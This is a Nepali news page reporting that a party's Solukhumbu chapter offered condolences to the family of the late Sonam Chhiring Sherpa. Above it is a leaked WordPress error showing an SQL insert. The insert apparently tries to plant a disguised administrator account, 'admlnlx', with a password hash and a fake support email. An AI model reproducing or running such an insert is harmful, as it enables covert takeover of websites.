WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BI0j8bEYGIZLe2u.iWOFkPVN0fKaBa.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-11 21:32:21', '', 'admlnlx', 'admlnlx')
काठमाडौं । राष्ट्रिय प्रजातन्त्र पार्टी सोलुखुम्बुले स्वर्गीय सोनामछिरिङ शेर्पाको परिवारमा समबेदना प्रकट गरेको छ । काठमाडौंको रामहिटीस्थित स्वर्गीय शेर्पाको निबासमै पुगेर सोमबार जिल्ला अध्यक्ष राजेन्द्र बस्नेतसहितका टोलीले उनको परिवारलाई औपचारिक रूपमा समबेदनापत्र बुझाएको हो । समबेदनापत्र परिवारकातर्फबाट सोलुखुम्बु जिबिसका पूर्व उप–सभापति आङदोर्जी शेर्पाले ग्रहण गरेका थिए।
स्वर्गीय शेर्पा पछिल्लो समय राजनीतिक रूपमा निष्क्रिय भएपनि लामो समयसम्म राप्रपामा आवद्ध रहेका थिए । राप्रपाको केन्द्रीय नेतृत्वमा रहेर विभिन्न जिम्मेवारी निर्बाह गरेका शेर्पा लोकेन्द्र बहादुर चन्द प्रधानमन्त्री हुंदा उनको राजनीतिक सल्लाहकार रहेका थिए । त्यतिबेला सोलुखुम्बुमा राप्रपालाई नेपाली कांग्रेससंगको मुख्य प्रतिस्पर्धी बनाउन उनले निर्बाह गरेको भूमिकाको सम्मान गर्दै आफ्नो सम्मानित र पुरानो नेताका रूपमा औपचारिक रूपमा श्रद्धाञ्जली व्यक्त गर्दै परिवारलाई समबेदनापत्र हस्तान्तरण गरिएको अध्यक्ष बस्नेतले बताए ।
समबेदनापत्र हस्तान्तरण गर्न शेर्पा निबासमा पूर्व प्रधानमन्त्री लोकेन्द्र बहादुर चन्दको प्रतिनिधिका रुपमा राप्रपाका केन्द्रिय सदस्य तीर्थराज चटौत, उपाध्यक्ष आङ्बाबु शेर्पा सहित राप्रपाका पुर्वनेताहरु इन्द्र राई ज्ञानेन्द्रजङ्ग बस्नेतको उपस्थिति रहेको अध्यक्ष बस्नेतले बताए ।
पुर्व प्रधानमन्त्री चन्दका प्रतिनिधि तथा राप्रपा केन्द्रीय सदस्य चटौतले स्वर्गीय शेर्पाले राप्रपामा गर्नुभएको योगदान अतुलनीय रहेको स्मरण गर्दै ०५४ सालमा पार्टी नेता लोकेन्द्रबहादुर चन्दलाई प्रधानमन्त्री बनाउन महत्वपूर्ण भूमिका निर्बाह गर्नुभएको बताए ।